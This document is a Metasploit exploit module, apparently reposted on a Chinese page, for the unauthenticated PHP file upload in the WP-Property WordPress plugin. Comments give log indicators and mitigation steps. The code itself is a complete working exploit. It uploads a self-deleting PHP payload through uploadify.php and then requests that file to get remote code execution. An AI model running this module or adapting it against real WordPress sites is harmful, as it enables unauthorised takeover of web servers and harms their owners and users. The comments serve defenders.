WordPress WP-Property PHP 文件上传漏洞
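##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description).
#
# What the listing shows, from a defender's point of view:
#   * The only endpoint touched is
#     wp-content/plugins/wp-property/third-party/uploadify/uploadify.php.
#     It is requested with GET by #check and with a multipart POST by #exploit.
#   * The POST carries two form fields: "Filedata" (a file whose name ends in
#     .php) and "folder" (the uploadify directory itself). No cookie, nonce or
#     credential is sent, so an anonymous POST with a "Filedata" part to that
#     path in web-server logs is the indicator to look for, followed by a GET
#     for a .php file in the same tree.
#   * The payload is built with :unlink_self => true, which presumably makes
#     it delete itself after running -- so a clean directory listing does not
#     rule out a past hit; rely on access logs instead.
#
# Mitigation: upgrade the plugin past the affected version, remove or deny
# access to third-party/uploadify/uploadify.php, and disable PHP execution in
# any directory the web server can write to.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (references, payload constraints, targets) and
  # the TARGETURI option that points at the WordPress base path.
  #
  # @param info [Hash] metadata overrides passed through to update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Presence check: requests uploadify.php and reports on the status code only.
  #
  # NOTE(review): a 200 proves only that the script is reachable. Nothing here
  # inspects the plugin version, so "Appears" can be reported for an install
  # where the file still exists but has been fixed or neutralised -- treat the
  # result as "endpoint exposed", not "confirmed vulnerable".
  #
  # @return [Exploit::CheckCode::Unknown] no response or a non-200 status
  # @return [Exploit::CheckCode::Appears] the script answered with 200
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uploadify_dir}uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a PHP payload through uploadify.php, then requests the path the
  # server returned so that the uploaded file is run.
  #
  # Calls fail_with(Exploit::Failure::UnexpectedReply) when the upload gets no
  # response, a non-200 status, or a body that does not mention the file name.
  def exploit
    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    # The "folder" field is caller-controlled and names the destination
    # directory; here it is set to the uploadify directory itself.
    data.add_part(uploadify_dir, nil, nil, "form-data; name=\"folder\"")
    # Removes a CRLF that sits on a line of its own directly in front of a
    # boundary marker -- presumably a quirk of Rex::MIME::Message#to_s; confirm.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uploadify_dir}uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # Literal substring test: the original interpolated the name into a
    # regex, where the "." in ".php" matched any character.
    unless res && res.code == 200 && res.body.to_s.include?(@payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # NOTE(review): the response body is used verbatim as the next request
    # path, with no check that it is a path at all -- confirm what
    # uploadify.php actually returns.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end

  private

  # Builds the path of the plugin's uploadify directory under TARGETURI,
  # with a trailing slash. Works on a new string so the configured
  # target_uri.path is not modified in place (the original appended to it
  # with <<).
  #
  # @return [String] e.g. "/wordpress/wp-content/plugins/wp-property/third-party/uploadify/"
  def uploadify_dir
    base = target_uri.path
    base = "#{base}/" unless base.end_with?('/')
    "#{base}wp-content/plugins/wp-property/third-party/uploadify/"
  end
end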
不要问我这写的是什么 怎么利用 我是说msf.